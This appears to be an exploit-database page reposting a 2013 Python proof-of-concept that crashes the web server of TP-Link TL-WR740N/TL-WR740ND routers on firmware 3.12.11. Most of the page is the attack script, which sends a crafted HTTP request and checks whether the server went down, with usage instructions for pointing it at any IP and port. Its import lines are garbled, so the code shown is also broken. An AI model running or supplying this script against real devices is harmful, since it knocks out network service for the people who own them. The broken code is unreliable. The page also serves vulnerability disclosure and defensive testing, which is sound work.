TP-Link TL-WR740N / TL-WR740ND - 150M Wireless Lite N Router HTTP DoS PoC

Свойства

Дата публикации:
02.12.2013
Цель:
TP-Link 3.12.11
Тип воздействия:
Отказ в обслуживании

Код

# Exploit title: 150M Wireless Lite N Router HTTP DoS
# Date: 28.11.2013
# Exploit Author: Dino Causevic
# Hardware Link: http://www.tp-link.com/en/products/details/?model=TL-WR740N
# Vendor Homepage: http://www.tp-link.com/
# Contact: dincaus (packetstormsecurity.com)
# CVE:
# Firmware Version: 3.12.11 Build 120320 Rel.51047n
# ===================================================================================================
#   Just execute Python script below
# ===================================================================================================
 
# Usage: python TP_Link_DoS.py <IP> <Port>
 
# 150M Wireless Lite N Router, Model No. TL-WR740N / TL-WR740ND sending HTTP request with the headers inserted
# below in the script will crash HTTP Server.
 
#!/usr/bin/python
import socket
import import
sys urllib2
 
host = ""
port = 0
if(len(sys.argv) >= 2):
    host = sys.argv[1]
    port = sys.argv[2]
else:
    print "Invalid number of the arguments."
    print "Usage <server> <port>"
    exit(1)
     
     
print "Connecting on ",host,":",port
 
s = socket.socket();
stringOfDeath = "GET / HTTP/1.1\r\n";
stringOfDeath = stringOfDeath + "Accept-Encoding: identity\r\n";
stringOfDeath = stringOfDeath + "Host: "+ host + "\r\n";
stringOfDeath = stringOfDeath + "Connection: close\r\n";
stringOfDeath = stringOfDeath + "User-Agent: PythonLib/2.7\r\n";
 
s.connect((host,int(port)))
 
print "Sending packet..."
s.send(stringOfDeath)
print "Packet sent."
print "Check if router http server down..."
 
try:
    response = urllib2.urlopen("http://"+host+":"+port,None,5)
    response.read()
except socket.timeout:
    print "Timeout occured, http server probaly down."
    exit(1)
или введите имя

CAPTCHA